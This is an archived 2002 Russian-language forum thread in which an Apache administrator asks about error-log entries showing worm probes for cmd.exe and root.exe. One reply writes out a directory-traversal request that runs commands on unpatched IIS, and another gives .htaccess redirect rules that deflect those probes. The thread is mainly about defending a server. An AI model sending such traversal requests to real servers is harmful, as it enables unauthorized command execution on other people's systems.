forum.opennet.ru - "httpd-error.log, что бы это значило?" (3)

форумы

помощь

поиск

регистрация

майллист

ВХОД

слежка

"httpd-error.log, что бы это значило?"

Форумы Информационная безопасность (Public)
Вариант для распечатки		Архивированная нить - только для чтения! Пред. тема \| След. тема
Изначальное сообщение		[Проследить за развитием треда]

"httpd-error.log, что бы это значило?"
Сообщение от Nick on 26-Дек-02, 13:36 (MSK)
сабж. [Thu Dec 26 11:43:59 2002] [error] [client 213.59.92.43] File does not exist: /www/scripts/root.exe [Thu Dec 26 11:44:03 2002] [error] [client 213.59.92.43] File does not exist: /www/MSADC/root.exe [Thu Dec 26 11:44:07 2002] [error] [client 213.59.92.43] File does not exist: /www/c/winnt/system32/cmd.exe [Thu Dec 26 11:44:18 2002] [error] [client 213.59.92.43] File does not exist: /www/d/winnt/system32/cmd.exe [Thu Dec 26 11:44:23 2002] [error] [client 213.59.92.43] File does not exist: /www/scripts/..\../winnt/system32/cmd.exe [Thu Dec 26 11:44:27 2002] [error] [client 213.59.92.43] File does not exist: /www/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe [Thu Dec 26 11:44:31 2002] [error] [client 213.59.92.43] File does not exist: /www/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe [Thu Dec 26 14:08:54 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/root.exe [Thu Dec 26 14:09:00 2002] [error] [client 213.29.75.3] File does not exist: /www/MSADC/root.exe [Thu Dec 26 14:09:06 2002] [error] [client 213.29.75.3] File does not exist: /www/c/winnt/system32/cmd.exe [Thu Dec 26 14:09:16 2002] [error] [client 213.29.75.3] File does not exist: /www/d/winnt/system32/cmd.exe [Thu Dec 26 14:09:20 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..\../winnt/system32/cmd.exe [Thu Dec 26 14:09:25 2002] [error] [client 213.29.75.3] File does not exist: /www/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe [Thu Dec 26 14:09:29 2002] [error] [client 213.29.75.3] File does not exist: /www/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe [Thu Dec 26 14:09:34 2002] [error] [client 213.29.75.3] File does not exist: /www/msadc/..\../..\../..\/..+../..+../..+../winnt/system32/cmd.exe [Thu Dec 26 14:09:44 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..+../winnt/system32/cmd.exe [Thu Dec 26 14:09:49 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..Lп../winnt/system32/cmd.exe [Thu Dec 26 14:09:53 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..+Ь../winnt/system32/cmd.exe [Thu Dec 26 14:10:03 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/..\../winnt/system32/cmd.exe [Thu Dec 26 14:10:05 2002] [error] [client 213.29.75.3] File does not exist: /www/scripts/../../winnt/system32/cmd.exe хакеры атакуют? %) PS: система - FreeBSD, Apache 1.3
	Рекомендовать в FAQ \| Cообщить модератору \| Наверх

Оглавление

RE: httpd-error.log, что бы это значило?, Dima, 14:14 , 26-Дек-02, (1)
RE: httpd-error.log, что бы это значило?, Nikola_SPb, 02:50 , 27-Дек-02, (2)
- RE: httpd-error.log, что бы это значило?, Nikola_SPb, 02:54 , 27-Дек-02, (3)

Индекс форумов | Темы | Пред. тема | След. тема

Сообщения по теме

1. "RE: httpd-error.log, что бы это значило?"

Сообщение от Dima on 26-Дек-02, 14:14  (MSK)

Да есть такое дело %)
при не патченом W2K от codeRed
при помощи простого запроса можно увидить чудную картинку
OPTIONS * HTTP\1.1
GET /scripts/..%5c..%5cWINNT/SYSTEM32/cmd.exe?/c+dir+C:\ HTTP/1.1
HOST: host.com
%)

Рекомендовать в FAQ | Cообщить модератору | Наверх

2. "RE: httpd-error.log, что бы это значило?"

Сообщение от Nikola_SPb on 27-Дек-02, 02:50  (MSK)

Меня уже полностью достали эти сетевые вирусы. Я еще могу понять, когда атаке или прощупыванию подвергается сервер, но когда атакуется уже твой домашний компьютер - это уже слишком. У меня дома постоянный Интернет. Так вот, в среднем я нахожу у себя в логах домашнего апача до сотни запросов произведенных вирусами.
А для хостинга это еще и прямой денежный убыток. Так как вы, как владелец сайта, вынуждены оплачивать трафик, производимый вирусами. А прямой виновник этого торжества Microsoft - даже и не чешется.
Надоело. Итак, давайте, защитим наш сайт от грязных посягательств не чистых запросов.
Вы используете .htaccess ? Если нет, то настало время. Создайте этот файл в корневой директории вашего вэб сайта и внесите туда следующие строки:
redirect /_vti_bin http://www.microsoft.com
redirect /scripts http://www.microsoft.com
redirect /MSADC http://www.microsoft.com
redirect /c http://www.microsoft.com
redirect /d http://www.microsoft.com
redirect /_mem_bin http://www.microsoft.com
redirect /msadc http://www.microsoft.com
RedirectMatch (.*)\cmd.exe$ http://www.microsoft.com$1

теперь практически все запросы от вирусов будут автоматически перенаправляться на сайт www.microsoft.com
Мы выигрываем на трафике и чистых логах, а микрософт получает свое родное.
Да, в дополнение. Способ проверен и работает для вэб сервера apache. Zeus тоже вроде должен понимать. Ну а IIS - проблема микрософта.

Рекомендовать в FAQ | Cообщить модератору | Наверх

3. "RE: httpd-error.log, что бы это значило?"

Сообщение от Nikola_SPb on 27-Дек-02, 02:54  (MSK)

P.S. Копирайт мне не известен.

Рекомендовать в FAQ | Cообщить модератору | Наверх

Удалить

Индекс форумов | Темы | Пред. тема | След. тема

Пожалуйста, прежде чем написать сообщение, ознакомьтесь с данными рекомендациями.

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "RE: httpd-error.log, что бы это значило?"
Сообщение от Dima on 26-Дек-02, 14:14 (MSK)
Да есть такое дело %) при не патченом W2K от codeRed при помощи простого запроса можно увидить чудную картинку OPTIONS * HTTP\1.1 GET /scripts/..%5c..%5cWINNT/SYSTEM32/cmd.exe?/c+dir+C:\ HTTP/1.1 HOST: host.com %)
	Рекомендовать в FAQ \| Cообщить модератору \| Наверх

2. "RE: httpd-error.log, что бы это значило?"
Сообщение от Nikola_SPb on 27-Дек-02, 02:50 (MSK)
Меня уже полностью достали эти сетевые вирусы. Я еще могу понять, когда атаке или прощупыванию подвергается сервер, но когда атакуется уже твой домашний компьютер - это уже слишком. У меня дома постоянный Интернет. Так вот, в среднем я нахожу у себя в логах домашнего апача до сотни запросов произведенных вирусами. А для хостинга это еще и прямой денежный убыток. Так как вы, как владелец сайта, вынуждены оплачивать трафик, производимый вирусами. А прямой виновник этого торжества Microsoft - даже и не чешется. Надоело. Итак, давайте, защитим наш сайт от грязных посягательств не чистых запросов. Вы используете .htaccess ? Если нет, то настало время. Создайте этот файл в корневой директории вашего вэб сайта и внесите туда следующие строки: redirect /_vti_bin http://www.microsoft.com redirect /scripts http://www.microsoft.com redirect /MSADC http://www.microsoft.com redirect /c http://www.microsoft.com redirect /d http://www.microsoft.com redirect /_mem_bin http://www.microsoft.com redirect /msadc http://www.microsoft.com RedirectMatch (.*)\cmd.exe$ http://www.microsoft.com$1 теперь практически все запросы от вирусов будут автоматически перенаправляться на сайт www.microsoft.com Мы выигрываем на трафике и чистых логах, а микрософт получает свое родное. Да, в дополнение. Способ проверен и работает для вэб сервера apache. Zeus тоже вроде должен понимать. Ну а IIS - проблема микрософта.
	Рекомендовать в FAQ \| Cообщить модератору \| Наверх


	3. "RE: httpd-error.log, что бы это значило?"
	Сообщение от Nikola_SPb on 27-Дек-02, 02:54 (MSK)
	P.S. Копирайт мне не известен.
		Рекомендовать в FAQ \| Cообщить модератору \| Наверх